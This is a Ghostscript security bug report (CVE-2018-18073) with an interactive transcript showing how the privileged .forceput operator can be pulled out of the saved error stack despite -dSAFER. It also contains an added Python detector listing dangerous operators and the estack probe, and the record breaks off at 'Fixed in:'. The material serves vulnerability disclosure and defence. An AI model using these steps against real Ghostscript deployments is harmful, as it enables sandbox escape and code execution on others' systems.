Bug 699927 - .setglobal exposes dangerous operators in saved estack
Summary: .setglobal exposes dangerous operators in saved estack
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: Security (public)
Version: unspecified
Hardware: PC Linux
Importance: P4 critical
Assignee: Chris Liddell (chrisl)
Depends on:
Reported: 2018-10-09 14:08 UTC by Tavis Ormandy
Modified: 2019-05-08 13:44 UTC

See Also:
Word Size: ---


Description Tavis Ormandy 2018-10-09 14:08:43 UTC
I've found a way of getting access to .forceput even after the fix in bug 699816: you can pull it out of the saved execution stack in $error:

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) (r) --.systemvmfile--} --stopped-- {--pop-- --pop-- $error /errorname --get-- /undefinedfilename --eq-- {.clearerror --exit--} --if-- /handleerror --.systemvar-- --exec-- null} --if-- --cvx-- {.runexec} .execute --pop--} --%loop_continue-- {--pop--} {$error /newerror --get-- --and-- {/handleerror --.systemvar-- --exec-- --flush-- true} {false} --ifelse--} false 1 --%stopped_push-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1919 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]

Notice the .forceput in there...

GS>$error /estack get 29 get ==
{-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}
GS>$error /estack get 29 get 6 get ==

See bug 699816 for a full exploit using .forceput
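As an added defender-side illustration (not part of this bug report or of Ghostscript's own code), the following Python heuristic flags PostScript input that names the internal operators this report mentions or that probes `$error /estack` the way the transcript above does; the tokenizer, rule names and sample inputs are my own construction.

```python
import re
# Indicators from the report: internal operators a -dSAFER job should never
# name directly, and the $error /estack probe that recovers them (my rule names).
DANGEROUS_OPS = {".forceput", ".setglobal", ".systemvar", ".systemvmfile"}
_TOKEN_RE = re.compile(r"\$?/?[A-Za-z_.][A-Za-z0-9_.$]*|\d+|[{}\[\]]")

def tokenize(ps_text):
    """Minimal PostScript tokenizer: drops % comments and (...) strings
    (nested parens, backslash escapes) so their contents cannot cause
    false positives; returns the remaining bare tokens."""
    tokens, i, n = [], 0, len(ps_text)
    while i < n:
        c = ps_text[i]
        if c == "%":                       # comment runs to end of line
            while i < n and ps_text[i] not in "\r\n":
                i += 1
        elif c == "(":                     # string literal
            depth = 0
            while i < n:
                if ps_text[i] == "\\":
                    i += 1                 # skip the escaped character
                elif ps_text[i] == "(":
                    depth += 1
                elif ps_text[i] == ")":
                    depth -= 1
                    if depth == 0:
                        break
                i += 1
            i += 1                         # step past the closing paren
        else:
            m = _TOKEN_RE.match(ps_text, i)
            if m:
                tokens.append(m.group(0))
                i = m.end()
            else:
                i += 1                     # operator punctuation such as ==
    return tokens

def scan(ps_text, window=4):
    """Findings: a dangerous operator used directly, or '$error' followed
    within `window` tokens by both '/estack' and 'get'."""
    toks, findings = tokenize(ps_text), []
    for idx, t in enumerate(toks):
        if t in DANGEROUS_OPS:
            findings.append(("dangerous-operator", t))
        elif t == "$error":
            ahead = toks[idx + 1:idx + 1 + window]
            if "/estack" in ahead and "get" in ahead:
                findings.append(("estack-probe", " ".join([t] + ahead)))
    return findings
```

Run `scan()` over a job before handing it to the interpreter; a hit is a reason to reject or quarantine the file, not proof of exploitation, since legitimate error handlers may also touch `$error`.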
Comment 1 Tavis Ormandy 2018-10-09 14:37:49 UTC
This is CVE-2018-18073
Comment 2 Chris Liddell (chrisl) 2018-10-10 16:20:57 UTC
Fixed in: